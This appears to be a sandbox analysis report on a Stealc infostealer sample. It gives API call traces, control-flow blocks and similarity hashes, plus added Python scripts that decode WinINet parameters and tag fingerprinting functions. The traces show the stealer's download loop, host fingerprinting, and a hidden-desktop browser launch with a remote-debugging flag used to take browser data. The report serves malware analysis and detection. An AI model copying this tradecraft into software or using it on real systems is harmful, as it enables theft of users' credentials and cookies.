• 1934: 8e6d4d -> 1936
• 1936: 8e6d50-8e6d55 -> 1932, 1938
• 1938: 8e6d57-8e6d7d, call 907340 -> 1941, 1942
• 1941: 8e6d7f, call 8e2930 -> 1942
• 1942: 8e6d84-8e6d91, call 8e2840 -> 1946, 1947
• 1946: 8e6d93-8e6d97 -> 1947, 1948
• 1947: 8e6da1-8e6dcb, call 8e2930 InternetReadFile -> 1932, 1936
• 1948: 8e6d99-8e6d9b, lstrcpy -> 1947
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008E6BAF
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 008E6C02
                                  • InternetOpenA.WININET(0090D014,00000001,00000000,00000000,00000000), ref: 008E6C15
                                  • StrCmpCA.SHLWAPI(?,010CD6E8), ref: 008E6C2D
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 008E6C55
                                  • HttpOpenRequestA.WININET(00000000,GET,?,010D1620,00000000,00000000,-00400100,00000000), ref: 008E6C90
                                  • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 008E6CB7
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008E6CC6
                                  • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 008E6CE5
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 008E6D3F
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008E6D9B
                                  • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 008E6DBD
                                  • InternetCloseHandle.WININET(00000000), ref: 008E6DCE
                                  • InternetCloseHandle.WININET(?), ref: 008E6DD8
                                  • InternetCloseHandle.WININET(00000000), ref: 008E6DE2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 008E6E03
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                                  • String ID: ERROR$GET
                                  • API String ID: 3687753495-3591763792
                                  • Opcode ID: 79ed8f97994a7a12346e2863fbf670f9f554d2d1669704fbdf7f57b9d3e89010
                                  • Instruction ID: 671cf7931a1ba3d5b428832f330d11f40e01eb81b9ac2a0c45107d31740e2713
                                  • Opcode Fuzzy Hash: 79ed8f97994a7a12346e2863fbf670f9f554d2d1669704fbdf7f57b9d3e89010
                                  • Instruction Fuzzy Hash: CF819C71A41259ABEB20DFA5CC49BEE77B8FF45750F144068F904E7280EB70AE418B91
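The WinINet parameters in this trace read as a plain HTTP GET download loop once the numeric constants are named: InternetOpenA is called with access type 1 (INTERNET_OPEN_TYPE_DIRECT, no proxy) and a user-agent pointer inside the image (0090D014), InternetConnectA with service 3 (INTERNET_SERVICE_HTTP), InternetSetOptionA with option 0x1F (INTERNET_OPTION_SECURITY_FLAGS) and a 4-byte buffer, reached only through the check in block 1912, HttpQueryInfoA with level 0x13 (HTTP_QUERY_STATUS_CODE), and InternetReadFile reads 0x7CF (1999) bytes per iteration in the loop formed by blocks 1936, 1938, 1942 and 1947. The dwFlags argument of HttpOpenRequestA is rendered by the sandbox as -00400100; the page does not say how that sign is to be read. The Python below is an added example, not part of the report: it decodes these constants from lines in the report's format. It treats a leading '-' as a two's-complement rendering (an assumption) and marks such values for confirmation against the disassembly; the flag table is the standard wininet.h INTERNET_FLAG_* set, and the 0x80400100 value in the demo at the bottom is illustrative only, not a value taken from this sample.

```python
import re

# Constructed input: the WinINet lines of the function above, copied in the
# report's format ("?" marks values the sandbox did not resolve).
TRACE = """
InternetOpenA.WININET(0090D014,00000001,00000000,00000000,00000000), ref: 008E6C15
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 008E6C55
HttpOpenRequestA.WININET(00000000,GET,?,010D1620,00000000,00000000,-00400100,00000000), ref: 008E6C90
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 008E6CB7
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 008E6CE5
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 008E6D3F
"""

# Constants from wininet.h (only the tables this function needs).
OPEN_TYPE = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT",
             3: "INTERNET_OPEN_TYPE_PROXY", 4: "INTERNET_OPEN_TYPE_PRECONFIG_WITH_NO_AUTOPROXY"}
SERVICE = {1: "INTERNET_SERVICE_FTP", 2: "INTERNET_SERVICE_GOPHER", 3: "INTERNET_SERVICE_HTTP"}
OPTION = {31: "INTERNET_OPTION_SECURITY_FLAGS"}
QUERY = {19: "HTTP_QUERY_STATUS_CODE"}
REQUEST_FLAGS = {
    0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE", 0x00000200: "INTERNET_FLAG_NO_UI",
    0x00000400: "INTERNET_FLAG_HYPERLINK", 0x00000800: "INTERNET_FLAG_RESYNCHRONIZE",
    0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID", 0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00004000: "INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS", 0x00008000: "INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP",
    0x00010000: "INTERNET_FLAG_CACHE_IF_NET_FAIL", 0x00020000: "INTERNET_FLAG_RESTRICTED_ZONE",
    0x00040000: "INTERNET_FLAG_NO_AUTH", 0x00080000: "INTERNET_FLAG_NO_COOKIES",
    0x00100000: "INTERNET_FLAG_READ_PREFETCH", 0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT",
    0x00400000: "INTERNET_FLAG_KEEP_CONNECTION", 0x00800000: "INTERNET_FLAG_SECURE",
    0x01000000: "INTERNET_FLAG_FROM_CACHE", 0x02000000: "INTERNET_FLAG_MAKE_PERSISTENT",
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE", 0x08000000: "INTERNET_FLAG_PASSIVE",
    0x10000000: "INTERNET_FLAG_ASYNC", 0x20000000: "INTERNET_FLAG_EXISTING_CONNECT",
    0x40000000: "INTERNET_FLAG_RAW_DATA", 0x80000000: "INTERNET_FLAG_RELOAD",
}

LINE_RE = re.compile(r"^(?P<api>\w+)\.(?P<dll>\w+)\((?P<args>[^)]*)\),\s*ref:\s*[0-9A-Fa-f]+$")


def to_u32(arg):
    """Parse one argument as unsigned 32-bit.

    Assumption: a leading '-' in the report is a two's-complement rendering
    of a value whose top bit is set. Confirm against the disassembly before
    relying on a flag decode of such a value.
    """
    if arg.startswith("-"):
        return (-int(arg[1:], 16)) & 0xFFFFFFFF
    return int(arg, 16) & 0xFFFFFFFF


def decode_flags(value, table=REQUEST_FLAGS):
    """Split a bitmask into known flag names plus any bits not in the table."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    unknown = value & ~sum(table) & 0xFFFFFFFF
    return names, unknown


def decode_call(api, args):
    """Name the numeric parameters of the WinINet calls seen in this function."""
    out = {}
    if api == "InternetOpenA":                      # (agent, accessType, proxy, bypass, flags)
        out["dwAccessType"] = OPEN_TYPE.get(to_u32(args[1]), args[1])
    elif api == "InternetConnectA":                 # (h, server, port, user, pass, service, flags, ctx)
        out["nService"] = SERVICE.get(to_u32(args[5]), args[5])
        if args[2] != "?":
            out["nServerPort"] = to_u32(args[2])
    elif api == "HttpOpenRequestA":                 # (h, verb, object, version, referrer, accept, flags, ctx)
        out["lpszVerb"] = args[1]
        out["dwFlags"], out["unknown_bits"] = decode_flags(to_u32(args[6]))
        if args[6].startswith("-"):
            out["note"] = "sign-rendered value; confirm the immediate in the disassembly"
    elif api == "InternetSetOptionA":               # (h, option, buffer, bufferLength)
        out["dwOption"] = OPTION.get(to_u32(args[1]), args[1])
        out["dwBufferLength"] = to_u32(args[3])
    elif api == "HttpQueryInfoA":                   # (h, infoLevel, buffer, bufferLength, index)
        out["dwInfoLevel"] = QUERY.get(to_u32(args[1]), args[1])
    elif api == "InternetReadFile":                 # (h, buffer, bytesToRead, bytesRead)
        out["dwNumberOfBytesToRead"] = to_u32(args[2])
    return out


def decode_trace(text):
    """Map each API in the trace to its decoded parameters."""
    decoded = {}
    for raw in text.strip().splitlines():
        m = LINE_RE.match(raw.strip())
        if m is not None:
            decoded[m["api"]] = decode_call(m["api"], m["args"].split(","))
    return decoded


if __name__ == "__main__":
    for api, params in decode_trace(TRACE).items():
        print(api, params)
    # Illustrative value only, not taken from this sample.
    print(decode_flags(0x80400100))
```

The 4-byte buffer passed to INTERNET_OPTION_SECURITY_FLAGS is not dereferenced in the trace, so the decoder reports only the option and length; the value it carried (and therefore whether certificate errors were being ignored) has to come from the disassembly or a memory dump.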

Control-flow Graph (basic blocks as "id: address range, calls -> successor blocks"; the executed/not-executed colouring of the rendered graph is not preserved in text)

• 1951: 9026e0-902723, GetWindowsDirectoryA -> 1952, 1953
• 1952: 902725 -> 1953
• 1953: 90272c-90278a, GetVolumeInformationA -> 1954
• 1954: 90278c-902792 -> 1955, 1956
• 1955: 902794-9027a7 -> 1954
• 1956: 9027a9-9027c0, GetProcessHeap HeapAlloc -> 1957, 1958
• 1957: 9027c2-9027c4 -> 1959
• 1958: 9027c6-9027e4, wsprintfA -> 1959
• 1959: 9027fb-902812, call 907210
                                  APIs
                                  • GetWindowsDirectoryA.KERNEL32(?,00000104,?,010CD728), ref: 0090271B
                                  • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,0090A470,00000000,00000000,00000000,00000000,?,010CD728), ref: 0090274C
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,010CD728), ref: 009027AF
                                  • HeapAlloc.KERNEL32(00000000,?,010CD728), ref: 009027B6
                                  • wsprintfA.USER32 ref: 009027DB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Similarity
                                  • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowswsprintf
                                  • String ID: :\$C
                                  • API String ID: 1325379522-3309953409
                                  • Opcode ID: 08b8030ffece6fd6b41c8ca882f6bbd7feb0cabc65cb2c779eaeec9d2df60198
                                  • Instruction ID: a0827ecf4ae38c2c33fdd33bf5484baa062ab9bfe400a915f82d6bbce5e750c2
                                  • Opcode Fuzzy Hash: 08b8030ffece6fd6b41c8ca882f6bbd7feb0cabc65cb2c779eaeec9d2df60198
                                  • Instruction Fuzzy Hash: DE316FB1D482499FCB14CFB89989AEEBFBCFF5C710F10416AE505E7650E6349A408BA1

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  Similarity
                                  • API ID: AddressProc
                                  • String ID:
                                  • API String ID: 190572456-0
                                  • Opcode ID: 688e6d35e2a07d63d7563ec6ef8ec09139a5276153d4ba185559e42ce65944c1
                                  • Instruction ID: faa2bb45cfff8c8a066dcfdb7f03aa7be5bda38bcdc7b397fbb0a142ea15229e
                                  • Opcode Fuzzy Hash: 688e6d35e2a07d63d7563ec6ef8ec09139a5276153d4ba185559e42ce65944c1
                                  • Instruction Fuzzy Hash: 74315031A006569FCB21BBB9CC85B9E7BAEBF41740B444435F405D72A2DF70EC058791

                                  Control-flow Graph
                                  Basic blocks (graph image not reproduced): 8e4ae0-8e4aee; 8e4af0-8e4af5 (self-loop); 8e4af7-8e4b68 (??2@YAPAXI@Z * 3, lstrlenA, InternetCrackUrlA, call 8e2930)
                                  APIs
                                  • ??2@YAPAXI@Z.MSVCRT(00000800,010CD718), ref: 008E4B17
                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 008E4B21
                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 008E4B2B
                                  • lstrlenA.KERNEL32(?,00000000,?), ref: 008E4B3F
                                  • InternetCrackUrlA.WININET(?,00000000), ref: 008E4B47
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  Similarity
                                  • API ID: ??2@$CrackInternetlstrlen
                                  • String ID: <
                                  • API String ID: 1683549937-4251816714
                                  • Opcode ID: 6e29a0424f56f74ad5810ed898c2151ba07639bc9528fa2fdcf7dd4eba95b151
                                  • Instruction ID: 672731011e5ba6fe4ee7f8bc3b3d8256b970b69860237ccf83d2e61bb1d22f9f
                                  • Opcode Fuzzy Hash: 6e29a0424f56f74ad5810ed898c2151ba07639bc9528fa2fdcf7dd4eba95b151
                                  • Instruction Fuzzy Hash: 1C011B71D00218ABDB00DFA9E845B9EBBB8FB09320F008126F914E7290DF7459058BD4

                                  Control-flow Graph
                                  Basic blocks (graph image not reproduced): 902820-90284e (GetProcessHeap, HeapAlloc, call 9028b0); 902850-902859; 90285a-902879 (RegOpenKeyExA); 90287b-90288c (RegQueryValueExA); 902892-9028a2 (RegCloseKey)
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00902835
                                  • HeapAlloc.KERNEL32(00000000), ref: 0090283C
                                    • Part of subcall function 009028B0: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 009028C5
                                    • Part of subcall function 009028B0: HeapAlloc.KERNEL32(00000000), ref: 009028CC
                                    • Part of subcall function 009028B0: RegOpenKeyExA.KERNEL32(80000002,010CA508,00000000,00020119,00902849), ref: 009028EB
                                    • Part of subcall function 009028B0: RegQueryValueExA.KERNEL32(00902849,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00902905
                                    • Part of subcall function 009028B0: RegCloseKey.ADVAPI32(00902849), ref: 0090290F
                                  • RegOpenKeyExA.KERNEL32(80000002,010CA508,00000000,00020119,?), ref: 00902871
                                  • RegQueryValueExA.KERNEL32(?,010D0000,00000000,00000000,00000000,000000FF), ref: 0090288C
                                  • RegCloseKey.ADVAPI32(?), ref: 00902896
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  Similarity
                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                  • String ID: Windows 11
                                  • API String ID: 3466090806-2517555085
                                  • Opcode ID: 6d415f6875a57dec013cbfa0960e28346b3b37ec5593d9f892844b68ee711b58
                                  • Instruction ID: 65932b5bab53ae03f38a4e442f2ac826374430e486206c4cba9f565935032394
                                  • Opcode Fuzzy Hash: 6d415f6875a57dec013cbfa0960e28346b3b37ec5593d9f892844b68ee711b58
                                  • Instruction Fuzzy Hash: 2401A275A00218BFD7109BA4AC4DFEA777DEB44711F408158FE08D7290DE705A4187A0

                                  Control-flow Graph
                                  Basic blocks (graph image not reproduced): 8fefe0-8ff005 (call 8e2840); 8ff007-8ff00f; 8ff011-8ff013 (lstrcpy); 8ff019-8ff01d (call 8e6b80); 8ff022-8ff038 (StrCmpCA); 8ff03a-8ff052 (call 8e2930, call 8e2840); 8ff054-8ff05c; 8ff05e-8ff05f; 8ff061-8ff068 (call 8e2930); 8ff070-8ff078 (self-loop); 8ff07a-8ff087 (call 8e2840); 8ff089; 8ff08e-8ff08f (lstrcpy); 8ff095-8ff0f0 (call 8e2930 * 10)
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008FF013
                                  • StrCmpCA.SHLWAPI(?,ERROR,?,?,?,?,?,?,?,?,?,008FF54D), ref: 008FF02E
                                  • lstrcpy.KERNEL32(00000000,ERROR), ref: 008FF08F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID: ERROR
                                  • API String ID: 3722407311-2861137601
                                  • Opcode ID: 4284024aeb017d750c8084cb21c793da4cfe40004dbfef3a070a94744f56fca7
                                  • Instruction ID: 6e97a66df578073941a23c1c8c194b1b6f5e21bb1bd8a5f66cdc3f12801478a0
                                  • Opcode Fuzzy Hash: 4284024aeb017d750c8084cb21c793da4cfe40004dbfef3a070a94744f56fca7
                                  • Instruction Fuzzy Hash: FF213030A1068A9BCB20BF7ECC46AAA3BA8FF45704F404524B989DB213DF70DD618791

                                  Control-flow Graph
                                  Basic blocks (graph image not reproduced): 902a70-902ac2 (GetProcessHeap, HeapAlloc, GetComputerNameA); 902ac4-902ad6; 902ae4-902af9
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00902A9F
                                  • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00902AA6
                                  • GetComputerNameA.KERNEL32(00000000,00000104), ref: 00902ABA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  Similarity
                                  • API ID: Heap$AllocComputerNameProcess
                                  • String ID:
                                  • API String ID: 4203777966-0
                                  • Opcode ID: 081886a7eccee13d8c6bee23bd2a81c1b2c946a2dfff4ffa0bca8b9c6cb914c7
                                  • Instruction ID: 58930bfb2e50d999faf8ba8cfcd90069424a2c12e8f754613bc944d387d59974
                                  • Opcode Fuzzy Hash: 081886a7eccee13d8c6bee23bd2a81c1b2c946a2dfff4ffa0bca8b9c6cb914c7
                                  • Instruction Fuzzy Hash: 0D01AD72B44648ABDB10CF99EC49BAAB7ACF748B21F00426AE919D3780DB74590486A1
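The function blocks in this section share one text layout: an APIs list of `Name.MODULE(args), ref: address` entries (with `Part of subcall function` lines for calls made inside a callee), followed by a Similarity block carrying the API ID, String ID, Opcode ID and fuzzy hashes. The script below is an added example, not part of the Joe Sandbox report and not code from the Stealc sample; it parses that layout into records and tags the functions that collect host fingerprints (volume serial via GetVolumeInformationA, the CurrentBuildNumber registry value compared against "Windows 11", the computer name) or call into WinINet. The sample input is constructed from lines of this report, and the tag names and the rules behind them are this example's own choices.

```python
"""Parse Joe Sandbox per-function blocks (APIs + Similarity sections) into
records and tag functions that fingerprint the host or use WinINet."""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: APIs/Similarity lines copied from three function blocks
# of this report (Memory Dump Source lists omitted; the parser ignores them).
SAMPLE_REPORT = r"""
APIs
• GetWindowsDirectoryA.KERNEL32(?,00000104,?,010CD728), ref: 0090271B
• GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,0090A470,00000000,00000000,00000000,00000000,?,010CD728), ref: 0090274C
• GetProcessHeap.KERNEL32(00000000,00000104,?,010CD728), ref: 009027AF
• HeapAlloc.KERNEL32(00000000,?,010CD728), ref: 009027B6
• wsprintfA.USER32 ref: 009027DB
Similarity
• API ID: Heap$AllocDirectoryInformationProcessVolumeWindowswsprintf
• String ID: :\$C
• Opcode ID: 08b8030ffece6fd6b41c8ca882f6bbd7feb0cabc65cb2c779eaeec9d2df60198
• Instruction Fuzzy Hash: DE316FB1D482499FCB14CFB89989AEEBFBCFF5C710F10416AE505E7650E6349A408BA1
APIs
• GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00902835
• HeapAlloc.KERNEL32(00000000), ref: 0090283C
  • Part of subcall function 009028B0: RegQueryValueExA.KERNEL32(00902849,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00902905
• RegOpenKeyExA.KERNEL32(80000002,010CA508,00000000,00020119,?), ref: 00902871
• RegQueryValueExA.KERNEL32(?,010D0000,00000000,00000000,00000000,000000FF), ref: 0090288C
• RegCloseKey.ADVAPI32(?), ref: 00902896
Similarity
• API ID: Heap$AllocCloseOpenProcessQueryValue
• String ID: Windows 11
• Opcode ID: 6d415f6875a57dec013cbfa0960e28346b3b37ec5593d9f892844b68ee711b58
APIs
• GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00902A9F
• HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00902AA6
• GetComputerNameA.KERNEL32(00000000,00000104), ref: 00902ABA
Similarity
• API ID: Heap$AllocComputerNameProcess
• String ID:
• Opcode ID: 081886a7eccee13d8c6bee23bd2a81c1b2c946a2dfff4ffa0bca8b9c6cb914c7
"""

# "• [Part of subcall function ADDR: ]Name.MODULE[(args)][,] ref: ADDR"
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[^\s.(]+)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# "• Key: value" lines of the Similarity block
FIELD_LINE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: str
    ref: str
    subcall_of: Optional[str]  # callee address for "Part of subcall" lines, else None


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)  # String ID split on "$"
    opcode_id: str = ""
    instruction_fuzzy_hash: str = ""

    @property
    def first_ref(self) -> str:
        """Lowest direct-call address: a usable stand-in for the function's location."""
        direct = [a.ref for a in self.apis if a.subcall_of is None]
        return min(direct, key=lambda r: int(r, 16)) if direct else ""


def parse_report(text: str) -> list[FunctionRecord]:
    """Split the report text into one record per 'APIs' block."""
    records: list[FunctionRecord] = []
    cur: Optional[FunctionRecord] = None
    for line in text.strip().splitlines():
        if line.strip() == "APIs":
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None:
            continue
        m = API_LINE.match(line)
        if m:
            cur.apis.append(ApiCall(m["name"], m["module"], m["args"] or "", m["ref"], m["sub"]))
            continue
        m = FIELD_LINE.match(line)
        if m:
            key, val = m["key"], m["val"].strip()
            if key == "String ID":
                cur.strings = [s for s in val.split("$") if s]
            elif key == "Opcode ID":
                cur.opcode_id = val
            elif key == "Instruction Fuzzy Hash":
                cur.instruction_fuzzy_hash = val
    return records


def direct_call_sequence(rec: FunctionRecord) -> list[str]:
    """API names of the function's own calls in address order (subcall lines excluded)."""
    return [a.name for a in sorted((a for a in rec.apis if a.subcall_of is None),
                                   key=lambda a: int(a.ref, 16))]


def classify(rec: FunctionRecord) -> list[str]:
    """Tag a function by what its API calls and string references imply (tag names are this example's own)."""
    names = {a.name for a in rec.apis}
    all_args = " ".join(a.args for a in rec.apis)
    tags = []
    if names & {"GetVolumeInformationA", "GetVolumeInformationW"}:
        tags.append("hwid-from-volume-serial")
    if "CurrentBuildNumber" in all_args or any(s.startswith("Windows ") for s in rec.strings):
        tags.append("os-build-fingerprint")
    if names & {"GetComputerNameA", "GetComputerNameW", "GetComputerNameExA", "GetComputerNameExW"}:
        tags.append("hostname-collection")
    if any(a.module.upper() == "WININET" for a in rec.apis):
        tags.append("wininet-network")
    return tags


def profile(records: list[FunctionRecord]) -> list[str]:
    """Union of tags over all parsed functions, sorted, for a one-line sample summary."""
    return sorted({t for r in records for t in classify(r)})


if __name__ == "__main__":
    recs = parse_report(SAMPLE_REPORT)
    for r in recs:
        print(f"{r.first_ref}  {r.opcode_id[:16]}  {direct_call_sequence(r)}  {classify(r)}")
    print("sample profile:", profile(recs))
```

Feed it the full report text (copied from the page) instead of `SAMPLE_REPORT` to get one record per function; the Opcode ID and Instruction Fuzzy Hash fields carried on each record are the values to pivot on when hunting for other Stealc builds in a sandbox corpus, since they survive rebuilds that change addresses.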
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008FEF62
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID:
                                  • API String ID: 3722407311-0
                                  • Opcode ID: 9ea47589f373369ee23705cf7b159f7e5bcd47020d5e0dbd7d498a930f58a3f5
                                  • Instruction ID: 36d8138684dd761eee0d2746b50b54b85171e41229491f6e801c8dd0fc39267b
                                  • Opcode Fuzzy Hash: 9ea47589f373369ee23705cf7b159f7e5bcd47020d5e0dbd7d498a930f58a3f5
                                  • Instruction Fuzzy Hash: 31119C706201895BDB24FF7ED846E9E3BA8FF42340F805124B988DB252DA74ED658792
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008E602F
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 008E6082
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 008E60B5
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 008E60E5
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 008E6120
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 008E6153
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 008E6163
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$InternetOpen
                                  • String ID: "$------
                                  • API String ID: 2041821634-2370822465
                                  • Opcode ID: bac2ee151e31d41d21cfbdab59ef7db24c0af15fbd81a25be5c6e99c54151ab3
                                  • Instruction ID: 8bc058fdadc22c4428ee5ab5cd83fed9e17cd343059bd07bc022d0fc2b8a200b
                                  • Opcode Fuzzy Hash: bac2ee151e31d41d21cfbdab59ef7db24c0af15fbd81a25be5c6e99c54151ab3
                                  • Instruction Fuzzy Hash: A4526D31D00296AFCB21ABB9CC49BAE7BB9FF45350F058024F905E7252DB74ED128B91
                                  APIs
                                  • memset.MSVCRT ref: 008E97C4
                                  • lstrcatA.KERNEL32(?,?), ref: 008E97D8
                                  • lstrcatA.KERNEL32(?,?), ref: 008E97ED
                                  • lstrcatA.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 008E9800
                                  • memset.MSVCRT ref: 008E9815
                                    • Part of subcall function 00903E10: lstrcpy.KERNEL32(00000000,0090D014), ref: 00903E45
                                    • Part of subcall function 00903E10: lstrcpy.KERNEL32(00000000,010C4B10), ref: 00903E6F
                                    • Part of subcall function 00903E10: GetSystemTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,008E4D2A,?,00000014), ref: 00903E79
                                  • wsprintfA.USER32 ref: 008E9846
                                  • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 008E9869
                                  • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 008E9888
                                  • memset.MSVCRT ref: 008E98A6
                                  • lstrcatA.KERNEL32(?,?,?,00000000,00000103), ref: 008E98BB
                                  • lstrcatA.KERNEL32(?,?), ref: 008E98CD
                                  • lstrcatA.KERNEL32(?,00915118), ref: 008E98DD
                                  • memset.MSVCRT ref: 008E98F2
                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 008E991A
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008E9950
                                  • StrStrA.SHLWAPI(?,010D0060), ref: 008E9965
                                  • lstrcpyn.KERNEL32(00B193D0,?,00000000), ref: 008E9982
                                  • lstrlenA.KERNEL32(?), ref: 008E9996
                                  • wsprintfA.USER32 ref: 008E99A6
                                  • lstrcpy.KERNEL32(?,?), ref: 008E99BD
                                  • memset.MSVCRT ref: 008E99D3
                                  Strings
                                  Memory Dump Source
